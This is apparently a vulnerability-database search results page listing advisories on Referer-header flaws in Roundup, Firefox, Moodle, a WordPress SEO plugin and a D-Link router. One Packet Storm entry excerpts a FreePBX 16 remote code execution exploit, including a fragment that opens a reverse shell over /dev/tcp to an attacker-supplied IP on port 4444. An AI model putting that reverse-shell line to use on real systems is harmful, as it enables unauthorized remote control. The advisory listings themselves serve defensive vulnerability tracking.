Lucene search
+L

2541 matches found

osv_cve
osv_cve
•added 2024/07/17 8:15 p.m.•54 views

CVE-2024-39125

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References2
NVD
NVD
•added 2024/07/17 8:15 p.m.•79 views

CVE-2024-39125

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS0.00289EPSS
SaveExploits0References2
osv_pysec
osv_pysec
•added 2024/07/17 8:15 p.m.•57 views

PYSEC-2024-64

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References3
UbuntuCve
UbuntuCve
•added 2024/07/17 8:15 p.m.•28 views

CVE-2024-39125

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References3
PyPA
PyPA
•added 2024/07/17 8:15 p.m.•19 views

PYSEC-2024-64

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References3Affected Software1
osv_ubuntu
osv_ubuntu
•added 2024/07/17 8:15 p.m.•105 views

UBUNTU-CVE-2024-39125

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References4
Vulnrichment
Vulnrichment
•added 2024/07/17 12:00 a.m.•14 views

CVE-2024-39125

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.8AI score0.00289EPSS
SaveExploits0References2
Rapid7 Vulnerability Database (full)
Rapid7 Vulnerability Database (full)
•added 2024/07/17 12:00 a.m.•4 views

CVE-2024-39125: Improper Neutralization of Input During Web Page Generation

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References1
Positive Technologies
Positive Technologies
•added 2024/07/17 12:00 a.m.•29 views

PT-2024-28355 · Roundup · Roundup

Name of the Vulnerable Software and Affected Versions: Roundup versions prior to 2.4.0 Description: The issue allows for cross-site scripting XSS via a SCRIPT element in an HTTP Referer header. Recommendations: For versions prior to 2.4.0, update to version 2.4.0 or later to resolve the issue...

5.4CVSS5.5AI score0.00289EPSS
SaveExploits0References13
CVE
CVE
•added 2024/07/17 12:00 a.m.•106 views

CVE-2024-39125

Roundup

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References2Affected Software1
Cvelist
Cvelist
•added 2024/07/17 12:00 a.m.•88 views

CVE-2024-39125

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

0.00289EPSS
SaveExploits0References2
Mend
Mend
•added 2024/07/17 12:00 a.m.•22 views

CVE-2024-39125

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header...

5.4CVSS5.8AI score0.00289EPSS
SaveExploits0References7
osv_cve
osv_cve
•added 2024/06/11 1:15 p.m.•17 views

CVE-2024-5687

If a specific sequence of actions is performed when opening a new tab, the triggering principal associated with the new tab may have been incorrect. The triggering principal is used to calculate many values, including the Referer and Sec- headers, meaning there is the potential for incorrect...

5.3CVSS6.3AI score0.00411EPSS
SaveExploits1References2
Mend
Mend
•added 2024/06/11 12:40 p.m.•6 views

CVE-2024-5687

If a specific sequence of actions is performed when opening a new tab, the triggering principal associated with the new tab may have been incorrect. The triggering principal is used to calculate many values, including the "Referer" and "Sec-" headers, meaning there is the potential for incorrect...

6.9CVSS6.3AI score0.00411EPSS
SaveExploits1References2
Rapid7 Vulnerability Database (full)
Rapid7 Vulnerability Database (full)
•added 2024/06/11 12:00 a.m.•6 views

CVE-2024-5687: Improper Access Control

If a specific sequence of actions is performed when opening a new tab, the triggering principal associated with the new tab may have been incorrect. The triggering principal is used to calculate many values, including the Referer and Sec- headers, meaning there is the potential for incorrect...

5.3CVSS6.4AI score0.00411EPSS
SaveExploits1References1
Packet Storm
Packet Storm
•added 2024/06/03 12:00 a.m.•380 views

FreePBX 16 Remote Code Execution

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

7.4AI score
SaveExploits0
Positive Technologies
Positive Technologies
•added 2024/05/31 12:00 a.m.•38 views

PT-2024-25627 · Moodle +2 · Moodle +2

Name of the Vulnerable Software and Affected Versions: Moodle affected versions not specified Description: The issue arises from the unsafe direct use of the HTTP REFERER variable in the admin/tool/mfa/index.php file. Specifically, the referrer URL used by Multi-Factor Authentication MFA required...

9.8CVSS6.3AI score0.00944EPSS
SaveExploits1References48
VulnCheck KEV
VulnCheck KEV
•added 2024/05/29 12:00 a.m.•11 views

VulnCheck KEV: CVE-2023-6961

The WP Meta SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Referer’ header in all versions up to, and including, 4.5.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts ...

7.2CVSS7.4AI score0.00445EPSS
SaveIn wildExploits0References2
NVD
NVD
•added 2024/05/23 10:15 p.m.•38 views

CVE-2024-5293

D-Link DIR-2640 HTTP Referer Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640-US routers. Authentication is not required to exploit this vulnerability. The...

8.8CVSS9.1AI score0.01606EPSS
SaveExploits0References1
osv_cve
osv_cve
•added 2024/05/23 10:15 p.m.•25 views

CVE-2024-5293

D-Link DIR-2640 HTTP Referer Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640-US routers. Authentication is not required to exploit this vulnerability. The...

8.8CVSS8.5AI score0.01606EPSS
SaveExploits0References1
Rows per page
Query Builder